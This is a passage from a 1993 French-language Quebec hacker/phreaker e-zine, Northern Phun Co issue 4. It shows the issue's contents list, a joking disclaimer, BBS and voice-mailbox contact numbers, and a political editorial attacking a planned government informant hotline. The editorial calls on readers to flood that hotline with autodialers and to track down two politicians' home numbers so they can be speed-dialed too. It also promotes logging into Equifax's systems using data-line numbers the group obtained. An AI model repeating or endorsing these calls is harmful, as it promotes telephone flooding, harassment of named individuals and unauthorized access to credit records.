Copy Link
Add to Bookmark
Report

Northern Phun Co Issue 04

eZine's profile picture
Published in 
Northern Phun Co
 · 4 years ago

  


ÞÛÛÛÛßÛÛÛÛ
ÛÛÛÛ ÛÛÛÛÞÛÛÛÛßÛÛÛÛÞÛÛÛÛßÛÛÛÛ ÛÛÛÛßÛÛÛÛÞÛÛÛÛ ÛÛÛÛÞÛÛÛÛßÛÛÛÛÞÛÛÛÛßÛÛÛÛÞÛÛÛÛßÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ßßßß ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ßßßß ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛßÛÛÛÜ ÛÛÛÛ ÛÛÛÛßÛÛÛÛ ÛÛÛÛßßß ÛÛÛÛßÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝÛÛÛÛ ÛÛÛÛÝ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝÛÛÛÛ ÛÛÛÛÝÛÛÛÛ ÛÛÛÛ

ÞÛÛÛÛßÛÛÛÛ ÞÛÛÛÛßÛÛÛÛ
ÛÛÛÛ ÛÛÛÛÞÛÛÛÛ ÛÛÛÛÞÛÛÛÛ ÛÛÛÛÞÛÛÛÛßÛÛÛÛ ÛÛÛÛ ÛÛÛÛÞÛÛÛÛßÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ßßßß ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛßßßßß ÛÛÛÛßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÝ ÛÛÛÛ ÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝÛÛÛÛ ÛÛÛÛÝ ÛÛÛÛÜÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝ ÛÛ


ÞÛÛÛÛÞÛÛÛÛßÛÛÛÛÞÛÛÛÛßÛÛÛÛÞÛÛÛÛ ÛÛÛÛÞÛÛÛÛßÛÛÛÛ ÞÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ßßßß ÛÛÛÛ ßßßß ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ßßßß ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßßßßßÛÛÛÛ ßßßßßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛßßß ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÜÛÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛÜÛÛÛÛÜ ÜÛÛÛÜ
ÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛÛ
ßßß ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ßßß
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝÛÛÛÛÜÛÛÛÛÝ ÛÛÛÛÝ


-=A PREVIOUSLY UNKNOWN LIFESTYLE=-

25-02-93




Dans ce quatriŠme num‚ro de NPC:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÑÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
Ûº<SUJET> ³<AUTEUR> º
ÛéÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĶ
ÛºTable des matiŠres / Disclaimer ³-=ThE PoSSe=- º
Ûºditorial de NPC #4 ³Blitzkreig º
ÛºLe franc parler du vieux M‚d‚e ³Merlin l'Emmerdeur º
ÛºThe postman always quote twice ³Votre courrier º
ÛºLa s‚curit‚ des r‚seaux ³Blitzkreig º
ÛºThe Bread Box ³-=ThE PoSSe=- º
ÛºPour payer ses comptes du Bell ³THX 1138 º
ÛºLes adieux de Predat0r ³Blitzkreig º
ÛºComment hacker les VMB ³Mental Floss º
ÛºHacker d'une forteresse ³Blitzkreig º
ÛºCh‚rie, barre les portes on sort...³Santa Claus º
ÛºCr‚er des acomptes sur VAX ³SubHuman Punisher º
ÛºO— sont pass‚s tous les rebelles? ³Blitzkreig º
Ûºquifax et vous... ³Atreid Bevatron º
ÛºLes systŠmes du Bell ³Blitzkreig º
ÛºThe NPC song ³L0grus º
ÛºSmarts Drugs Redux ³Coaxial Karma º
ÛºNouveau systŠme pour les pompiers ³Blitzkreig º
ÛºSteve Jackson et Sun-Devil ³L0grus º
ÛºLa fabrication d'un warez ³Blitzkreig º
ÛºInitiation … DATAPAC ³Fairy Dust º
ÛºTrashing, Bell style ³-=ThE PoSSe=- º
ÛºLes ROLM-CBX ³Silicon Phreaker/UPIº
ÛºRead the news... ³-=ThE PoSSe=- º
ÛºFiction et compagnie ³Dynamix º
ÛÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÏÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß


NPC are: Officiers Collaborateurs

Blitzkreig Santa Claus
Coaxial Karma Fairy Dust
Mental Floss Silicon Phreaker
Atreid Bevatron Merlin L'Emmerdeur
The SubHuman Punisher THX 1138
L0grus

Invit‚ sp‚cial
Dynamix

Greets to: Lost Avenger and the UPI gang
Knight Excalibur
Gengis Dan
Master Ninja (Passe moi le beurre)

DISCLAIMER - AVERTISSEMENT

Ce magazine n'est pas recommand‚ aux gens qui portent un Pacemaker, aux
ƒmes sensibles, et aux moralisateurs. Tenez-vous le pour dit, et abstenez-
vous!
Ceci va probablement ˆtre le disclaimer le plus long de l'histoire des
magazines underground car, sur les conseils de gens g‚n‚ralement bien
vers‚s dans le domaine (vous savez que les avocats r‚clament 150$ de
l'heure? Chi‚!) une mise au point exhaustive doit ˆtre faite avant de vous
permettre de poursuivre votre lecture (et non pas de poursuivre Northern
Phun Co.: vous ˆtes pas dr“les!).

1) Tous les articles de ce magazine ne sont publi‚s qu'… titre
d'information. L'application de une ou des technique(s) expliqu‚e(s) dans
ces pages peuvent entraŒner la mort, des blessures s‚rieuses,
l'impuissance, la perte de votre virginit‚, des poursuites judiciaires
embˆtantes, le bris de votre ordinateur, la nomination de Camil Samson …
la tˆte du Parti Lib‚ral ou, pire encore, vous pourriez devenir comme vos
parents!

2) Northern Phun Co., qui est un organisme … but non-lucratif, avec une
vocation quasiment philanthropique, ne sera en aucun temps tenu pour
responsable de l'irresponsabilit‚ des auteurs qui publient des articles
dans ces pages. L'entiŠre responsabilit‚, et la preuve de la v‚racit‚
desdits articles, revient aux auteurs. On est mal parti, l…, les enfants...

3) Les officiers clairement identifi‚s de Northern Phun Co. sont seuls
habilit‚s … parler au nom du groupe, et NPC ne serait ˆtre tenu pour
responsable de la conduite (ou de l'inconduite) des collaborateurs de NPC
sur les babs de la planŠte Terre. De plus, seuls les textes des officers
de Northern Phun Co. sont v‚rifi‚s pour leur exactitude.

4) La lecture de Northern Phun Co., quoique r‚jouissante, peut entraŒner
aussi des problŠmes de sant‚ mentale et des cas de pilosit‚ manuelle (comme
pour la masturbation).

5) Northern Phun Co accepte, … priori, de publier tous les textes touchant
au H/P/C/A/V-et-le-reste qui lui seront soumis. NPC refusera, par contre,
tout texte encourageant la discrimination d'une ou des personne(s) en
fonction de leur origines ethniques, de leur religion ou de leur sexe. Si
vous voulez bouffer du nŠgre, engagez-vous plut“t dans la police...

6) Northern Phun Co. tient … rappeler … ses lecteurs qu'il faut
soigneusement se brosser les dents aprŠs chaque repas. Et n'oubliez pas la
soie dentaire!

Est-ce que ‡a suffit l…?



O— nous rejoindre?
------------------

D– la nature "volatile" de notre produit, les babs qui nous supportent le
sont tout aussi. Ceci dit:

Vous avez toutes les chances de pogner un des officiers de NPC sur les babs
PUBLICS suivants (on pousse la perversion jusque l…!).
Galaxy BBS : 418-628-5150
Light BBS : 418-651-5664
Wild BBS : 418-658-8939
Black Palace : 418-831-1602

Si votre babillard public (hors 418) d‚sire ouvrir une section NPC,
n'h‚sitez pas … nous contacter. C'est gratuit!

Nous sommes aussi (naturellement) sur les boards pirates de Qu‚bec. En
fait, sur Workshop, il y a tous les officiers de NPC qui prennent un bain
de soleil... C'est comme qui dirait notre H.Q. underground. Alors, si vous
voulez venir y jeter un coup d'oeil, laissez un message sur une de nos VMB,
et on vous rappellera.

Nos sites officiels H/P hors-418 sont:

Silicon Valley 204-XXX-XXXX
The Works 617-XXX-XXXX
The Dial Up 514-XXX-XXXX
Brain Damage 819-XXX-XXXX
The Pentagon 416-XXX-XXXX

A Montr‚al, NPC est aussi, officieusement, chez Metal Addiction, Cybernetic
Violence et Phrozen Realm, et plusieurs autres. Your best bet is...

Quelqu'un a parl‚ de VMB? Essayez celle-‡i:

1-800-521-2070, code *169 (VMB)


Nous avons aussi deux adresses Internet pour e-mail:

subhuman@silicon.bison.mb.ca

tsp@works.UUCP

Un site FTP suivra trŠs bient“t...


Et si malgr‚ tout ‡a vous n'ˆtes pas capable de nous rejoindre, appelez
l'Arm‚e du Salut, et demandez Roger...




ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

CE MAGAZINE EST COMMANDITE PAR BELL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


SPCIAL "CONSCIENCE SOCIALE"


A BAS LES CRAPULES!
------------------

DITORIAL
par
Blitzkreig


On va faire ‡a sobrement, les amis.
Ouvrez les rangs.
Tendez les mains.
On distribue les couteaux...

€a parle au diable! D‚j… le num‚ro quatre! Et quel num‚ro! The best,
the biggest, and the wildest ever! C'est comme on vous le dit! Par la barbe
du prophŠte! La cl‚ qui supporte mon point d'exclamation est barr‚e!!!

Un dr“le de mois dans l'actualit‚, ce f‚vrier, non? On dirait que, …
peu prŠs vers le temps o— ils doivent payer les achats des fˆtes sur leurs
cartes de cr‚dit, les politiciens d‚connent. Frustration? Appƒt du gain?
Et le r‚sultat, c'est des conneries de lois TOTALEMENT aberrantes. Le
ministre Valcourt, par exemple, qui tente de faire passer sa nouvelle
politique sur le ch“mage... Permettez-moi de vous resservir une image us‚e,
certes, mais oh! combien juste: le gouvernement a d‚cid‚ que le meilleur
moyen de r‚gler le problŠme ‚pineux ch“mage, c'‚tait de se d‚barrasser des
ch“meurs. Pas de s'en d‚barrasser en leur trouvant des jobs, non. C'est
trop compliqu‚, ‡a. En s'en d‚barrassant purement et simplement. Un des
futurs projets que caresse le gouvernement est d'engager les Hell's Angels
comme sous-contractants: le fleuve va bient“t ˆtre rempli de cadavres de
ch“meurs cousus dans des sacs de couchage...
J'exagŠre … peine, les kids. Della Noce, un sombre abruti d‚put‚ du comt‚
de Duvernay, conservateur de surcroŒt, … eu la brillante id‚e de mettre sur
pied une ligne 800, pour encourager la population canadienne … jouer aux
d‚lateurs, et … d‚noncer leurs voisins. Brillante id‚e! Comment n'y avait-
on pas pens‚ plus t“t? Bon sang, mais c'est bien s–r! A quand les chambres
… gaz? Pour plus de d‚tails, allez jeter un petit coup d'oeil … la fin de
cet ‚ditorial. Il y a l… un petit billet de Jean V. Dufresne, et un autre
de Pierre Foglia, sur le sujet qui vous y attendent.
Bon, vous en avez pas assez de ces enfoir‚s qui jouent avec nos nerfs? Vous
voulez vraiment que notre peuple vire collabo, comme dans les jours les
plus sombres du nazisme, du communisme, et de tous les autres "ismes" qui
n'ont jamais eu pour but que de ravaler l'homme au rang de b‚tail?
Aujourd'hui, on veut vous encourager … d‚noncer vos frŠres, peu importe
qu'ils fraudent l'assurance-ch“mage ou pas. Demain, on va avoir une ligne
1-800 pour d‚noncer le collŠgue de travail qui fume dans son bureau, une
autre pour d‚noncer l'‚tudiant qui ne met pas de condom pendant ses
relations sexuelles, une autre pour d‚noncer la mamie qui ose donner des
os de poulet … son chien, alors qu'il pourrait s'‚trangler, le pauvre...
C'est ‡a que vous voulez? Vous n'aurez de cesse de jouer aux cafardeurs
tant qu'il n'y aura pas un num‚ro pour d‚noncer les d‚nonciateurs? Vous
allez mˆme appeler pour vous d‚noncer aux autorit‚s?

Non.

Je ne le crois pas.

A part quelques demeur‚s ici et l…, vous vous r‚voltez comme nous lorsqu'on
vous parle de d‚lation sans motifs valables.
Le concert de protestations qui s'est ‚lev‚ … l'annonce de l'instauration
de cette "hot-line" a fait temporairement reculer les conservateurs. C'est
rassurant de voir qu'il reste encore des gens qui ont une certaine notion
de d‚cence, et qui n'h‚sitent pas … d‚noncer le gouvernement lorsqu'il fait
des conneries (c.a.d. bien souvent). Le r‚sultat de ce toll‚: la ligne est
sur la glace. Pour combien de temps?

Alors, voici ce qu'on va faire, les touts petits: on va leur rendre la
monnaie de leur piŠce, on va vous garrocher ce num‚ro 1-800, celui de la
ligne de d‚lation, s'il revient jamais dans le portrait, et vous allez
composer, les amis! Oh! Pas vous personnellement en personne, hon! Laissez
plut“t votre ordi servir une le‡on aux politiciens. Un petit autodial
configur‚ dans le sens du monde, une trentaine de jeunes qui d‚butent, mais
qui ont du beat, et on est capable d'overloader toutes les nodes de cette
ligne odieuse! Pensez-y: si nous pouvons accaparer, 24 heures par jour, la
ligne de la honte, les vrais d‚lateurs -ces petits ‚trons d‚goulinants- ne
pourront pas vendre leurs voisins. Pas besoin de r‚pondre, non, il suffit
seulement que votre autodial soit configur‚ pour composer le num‚ro, et
composer, et composer. Lorsqu'il accroche la ligne, il raccroche
automatiquement et se remet … composer, composer, composer... C'est pas
ill‚gal, ‡a, les mecs, ce n'est pas un geste de d‚sob‚issance civile, ce
n'est pas un crime non plus, rien. Lorsqu'il y a des ‚lections, les gens
manifestent leurs sentiments envers le gouvernement en allant voter. Entre
les ‚lections, on parle avec nos pieds lorsqu'il y a une manifestation. Et
lorsqu'il y a un num‚ro de t‚l‚phone qui incite des gens d‚cents et normaux
… se comporter avec autant de moralit‚ qu'un mis‚rable vermisseau se
r‚fugiant sous une roche, on vote avec nos t‚l‚phones. DŠs que le num‚ro
est connu, les mecs, c'est promis, on vous le poste, et on vous enverra un
speed-dialer en prime, si vous n'en avez pas! Tiens, une derniŠre id‚e sur
le sujet: puisque Valcourt et Della Noce aiment tellement les t‚l‚phones,
on pourrait aussi les speed-dialer? Quelqu'un pourrait-il nous trouver
leurs num‚ros … domicile? Ces enfl‚s! Quand je pense qu'au provincial, un
simple d‚put‚ comme cette enflure de Richard Holden possŠde un budget
DISCRTIONNAIRE (‡a veut dire qu'il … le droit de le d‚penser n'importe
comment... et c'est ce qu'il fait, l'abruti!), un budget de 100 000$ par
ann‚e! Je me demande quel est le budget discr‚tionnaire de Valcourt et de
Della Quasimodo? Il faut en buster des fraudeurs pour payer les d‚penses
de ces gens-l…!

Je suis parti, l…, ne m'arrˆtez pas!

QUIFAX, maintenant: vous savez que cette compagnie de recouvrement possŠde
des dossiers sur plus de QUINZE millions de canadiens? Et c'est la maniŠre
dont ils se les procurent qui est particuliŠrement d‚gueulasse. Encore une
fois, allez jeter un coup d'oeil dans notre revue de presse... quifax sait
tout sur vous... et le vend sans aucun discernement au plus offrant. On
s'est dit qu'il serait temps que VOUS sachiez tout sur quifax... Ce n'est
que justice, votre honneur, j'invoque la l‚gitime d‚fense!
Non, s‚rieusement, Atreid Bevatron vous a concoct‚ un premier texte sur
Equifax. On a mis la main sur le manuel d'utilisation, section
"entreprises" et "citoyen", du systŠme informatis‚ de cette compagnie,
ainsi que sur le num‚ro de t‚l‚phone data d'quifax … Qu‚bec! Nous
commen‡ons ici … vous livrer, pieds et poings li‚s, ces informations! Soyez
prudents, et allez v‚rifier vos dossiers de cr‚dit pour y voir les horreurs
qu'on y ‚crit... et dites-vous que la plupart de vos concitoyens n'ont pas
la chance d'avoir les connaissances et la maŒtrise de la technologie
n‚cessaires pour faire de mˆme. Pensez … eux lorsque vous loggerez, kids...
Ha! C'est vrai! Vous allez avoir besoin du "term" pour logger... Regardez
sur les babs undergrounds fr‚quent‚s par NPC: un petit cadeau va bient“t
y apparaŒtre, courtoisie de vos petits amis du North... avec un fichier en
prime, contenant tous les num‚ros des lignes data d'Equifax … Qu‚bec.


J'aurais bien le go–t de vous faire une mont‚e de lait sur les grands
pollueurs, comme Tioxyde, qui menace de fermer son usine si on ne lui
permet pas de continuer … polluer impun‚ment le St-Laurent. Voyons si les
couillons qui nous gouvernent vont se plier … ce chantage...
Mais pas de mont‚e de lait, autrement: notre ex-felquiste pr‚f‚r‚, Merlin
L'Emmerdeur est d‚j… pass‚ l… avant moi. Ne manquez pas le deuxiŠme volet
de sa s‚rie sur la r‚sistance passive, qui suit imm‚diatement cet article.
Il y r‚pond d'ailleurs, avec plus de tact et d'esprit que je n'en aurai
jamais, aux d‚tracteurs de Northern Phun Co., ces bons petits diables...


Et pour le reste du magazine, plein de bonnes choses. On vous donne d‚j…
plusieurs des outils dont vous aurez besoin pour aider le peuple … se
d‚barrasser des crapules. Un texte, qui lui aussi fera date, sur le hack
des Voice Mail Box, de A … Z, par Mental Floss. C'est simple comme bonjour,
dudes. Vous pouvez facilement hacker 2 VMB par semaine, sans respirer. Mais
une VMB 800, c'est plus qu'un r‚pondeur t‚l‚phonique, les amis, ‡a peut
aussi ˆtre le PBX par excellence! En effet, l'utilisation des out-dials des
VMB suivront dans NPC #5...
Un texte de Coaxial Karma qui se veut la suite logique de mon article (voir
NPC #2) sur les smart drugs. Cette s‚rie se poursuivra aussi dans NPC #5.
Un texte de The SubHuman Punisher sur les VAX.
Un texte de THX 1138 sur le civisme qui va encore vous faire jubiler, ou
vous faire rager, c'est selon.
Une visite de Santa Claus du Cybernetic Violence, un des Grands Boards dans
le 514, avec un in‚dit de Bruce Sterling en prime!
Quelques petits textes de votre serviteur sur les r‚seaux et toute cette
sorte de choses. Et puis... un petit texte de Fairy Dust, une espŠce
d'intro sur les DATAPAC du Bell. C'est pas risqu‚ de hacker ‡…? En tous les
cas, c'est, nous dit-il, le premier texte d'une s‚rie sur ces lignes …
haute vitesse...
Logrus nous offre le premier volet d'une paire d'articles sur STEVE JACKSON
GAMES. Rappellons briŠvement que cette compagnie de jeux am‚ricaines ‚tait
pass‚e au batte lors de l'op‚ration Sun-Devil...

Beaucoup mieux... Northern Phun Co. -le mensuel- a r‚vis‚ sa politique
‚ditoriale. Vous tenez le NOUVEAU NPC entre vos mains:

1) Fini le trash, le rag ou les m‚disances … outrance sur les quelques
losers du 418. Nous comprenons que ‡a peut devenir fatiguant, … la longue,
et que ‡a laisse une mauvaise impression de la scŠne … Qu‚bec … nos
lecteurs des autres r‚gions. Et puis, quand il s'agit de d‚truire la
r‚putation d'un lame, on a maintenant PHUN WEEK ONLINE! Eh oui, pour les
lecteurs hors-418 qui ne seraient pas au courant, NPC a commenc‚ … publier
un HEBDOMADAIRE, en plus du mensuel que vous tenez entre vos mains. Un
hebdo qui ne peut se d/l, et qui doit ˆtre lu online (ou captur‚). Seules
les personnes visitant nos babs 418 peuvent se repaŒtre de cette lecture!
Sorry guys!

2) Davantage d'articles "pointus" sur le phreaking, pour les connaisseurs
plus avanc‚s. On va bien entendu garder un aspect "g‚n‚raliste", histoire
de ne pas abandonner les d‚butants H/P, mais une grosse partie de ce mag
va ˆtre TRES technique. Nous venons nous-mˆme du milieu du phreak, et c'est
notre coeur qui parle...

3) Northern Phun Co. n'est pas qu'un magazine de piratage! On l'a toujours
dit, on le r‚pŠte encore: il y a des gens qui sont plus durs de comprenure
que d'autres... CONTRE-CULTURE est le mot cl‚, ici, les amis. ACTIVISME
SOCIAL en est un autre. Capice?

4) Northern Phun Co. a d‚cid‚ de s'associer avec les autres groupes
canadiens et am‚ricains publiant des 'zines underground! Une entente a ‚t‚
conclue entre UPI (United Phreakers International) et NPC pour l'‚change
de textes entre les deux parties. Attention! €a ne veut pas dire qu'on va
publier des textes de UPI vieux de cinq ans, traduits en fran‡ais! Au
contraire! On parle ici de traduction et de publication SIMULTANE de
nouveaux textes. A preuve le texte pr‚sent dans ce num‚ro de Silicon
Phreaker, UPI du 514, qui ne paraŒtra en anglais qu'… la fin avril...

Deux autres "joint-venture" sont pr‚sentement … l'‚tape de la n‚gociation.
De plus, vos officiers NPC seront … la prochaine r‚union 2600 … New-York,
le 6 mars prochain. On espŠre revenir de ce meeting, o— se retrouvent
habituellement Emmanuel Goldstein et les plus fameux pirates de la c“te
Est, avec des bonnes nouvelles!

-----------

C“t‚ mauvaises nouvelles, il faut que vous sachiez que nous avons eu
quelques petits problŠmes avec des gens qui s'‚taient mis en tˆte de nous
d‚noncer... Mais ce‡i ‚tant strictement un problŠme 418, on va pas vous
emmerder avec ‡…... Qu'il nous suffise de dire que nous avons rapidement
r‚gl‚ le problŠme, et sans effusion de sang, encore! Un r‚þit complet de
cette passionnante aventure devrait apparaŒtre dans un des prochains PHUN
WEEK ONLINE.

C'est super buggant, la d‚lation, il ne faut pas se le cacher... C'est
super cr‚tin aussi. Mais vous n'ˆtes pas oblig‚ de me croire, lisez les
journaux des derniŠres semaines...


Leeched from LE JOURNAL DE QUBEC - vendredi 12 f‚vrier 93


VALCOURT DLATEUR
par
Jean V. Dufresne



C'est le m‚tier le plus ignoble qui soit. Mais plus abjects encore sont
ceux qui encouragent la d‚nonciation anonyme, tel le ministre f‚d‚ral
d'Emploi et immigration, qui propose l'‚tablissement d'une ligne
t‚l‚phonique officielle du gouvernement, gratuite et accessible … tous les
citoyens assez d‚gueulasse pour d‚noncer leur voisins, qu'ils
soup‡onneraient de frauder l'assurance-ch“mage.

Bernard Valcourt est d'accord pour faire de la d‚lation une politique
officielle de l'tat canadien.
Si je n'avais pas de sympathie … l'‚gard de ceux qui souhaitent
rehausser les critŠres de s‚lection policiŠre, je proposerais … cet homme
de se recycler en agent double.
Voil… o— nous en sommes rendus avec la r‚forme de l'assurance-ch“mage.
On laisse maintenant aux d‚lateurs le soin de d‚busquer ceux qui pourraient
abuser de la nouvelle loi, elle mˆme g‚n‚ratrice des pires abus.
Or, la d‚lation, on c'est ce que c'est. Elle est faite de mesquinerie,
de vengeance, de jalousie, de rŠglements de comptes personnels. Elle
confŠre … n'importe quel citoyen canadien, sur la foi du moindre soup‡on,
sans preuve aucune, le pouvoir de d‚clencher une enquˆte policiŠre sur un
coup de fil anonyme.
Vous voulez vous venger de votre locataire qui vous a traŒn‚ devant
la R‚gie du logement, de la voisine vivant de l'aide sociale, qui partage
son trois-piŠces avec son chum? Faites marcher vos doigts parce que le
num‚ro de t‚l‚phone sera dans le bottin.
Et, en toute lƒchet‚, parce que la Commission d'assurance ch“mage vous
